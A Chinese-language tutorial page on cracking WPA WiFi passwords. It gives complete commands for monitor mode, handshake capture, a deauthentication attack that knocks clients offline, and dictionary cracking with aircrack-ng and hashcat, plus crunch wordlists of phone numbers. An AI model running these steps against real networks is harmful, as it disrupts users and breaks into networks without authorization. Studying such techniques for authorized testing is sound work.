跳转至

WiFi 安全

“WiFi 安全”

参考:

airmon-ng, airodump-ng, aireplay-ng, aircrack-ng 工具的使用

Bash
1
2
3
4
5
6
# 查看支持的网卡
airmon-ng 

# 将网卡切换成监听模式
# wlan0 是网卡名称,开启后会在后面加上mon
airmon-ng start wlan0
Bash
1
2
3
4
5
# 扫描无线列表
airodump-ng wlan0mon

# 查看指定 BSSID 的详情(非必要步骤)
airodump-ng -d 08:1F:71:xx:xx:xx wlan0mon
Bash
# 抓握手包,在这里面包含加密的密码
airodump-ng -c 1 --bssid 08:1F:71:xx:xx:xx -w ~/wifi/ wlan0mon

Bash
1
2
3
# 攻击连接上该热点的客户端,让其掉线重连,以获取握手包
# 注意:执行主动攻击的时候新建一个终端执行命令,原来的抓包终端不要结束
aireplay-ng -0 20 -a 08:1F:71:xx:xx:xx -c 04:33:85:xx:xx:xx wlan0mon
参数解释: - -0 表示发起deauthentication攻击 - -a 指定无线路由器BSSID - -c 指定强制断开的设备

Bash
1
2
3
4
5
# 停止监听模式
airmon-ng stop wlan0mon

# 跑字典获取密码
aircrack-ng -a2 -b 08:1F:71:xx:xx:xx -w /usr/share/wordlists/rockyou.txt ~/wifi/*.cap 
参数解释:

  • -a2 代表WPA的握手包
  • -b 指定要破解的wifi BSSID。
  • -w 指定字典文件
  • 最后是抓取的包

使用 Hashcat 快速跑字典

Hashcat for windows: hashcat-5.1.0.7z hashcat-utils

Text Only
1
2
3
4
5
# 转换 cap 为 hccapx
cap2hccapx.exe 01.cap 01.hccapx

# 用 Hashcat 跑字典,支持 GPU 加速,其中指定 session 可以保存日志或进度
hashcat64.exe -m 2500 D:\test\01.hccapx D:\zd\word.txt  --session=whypie0

使用 Crunch 生成任意字典

  • https://github.com/shadwork/Windows-Crunch/releases

生成手机号,新建一个 num.txt 文件,内容为:

Text Only
numeric = [345789]

然后让其生成,最后文件非常大,有 72.6 GB!:

Text Only
crunch 11 11 -f ./num.txt numeric -t 1@%%%%%%%%% -o allPhones.txt
  • 生成8位随机数字:crunch 8 8 0123456789 -o digits_8.txt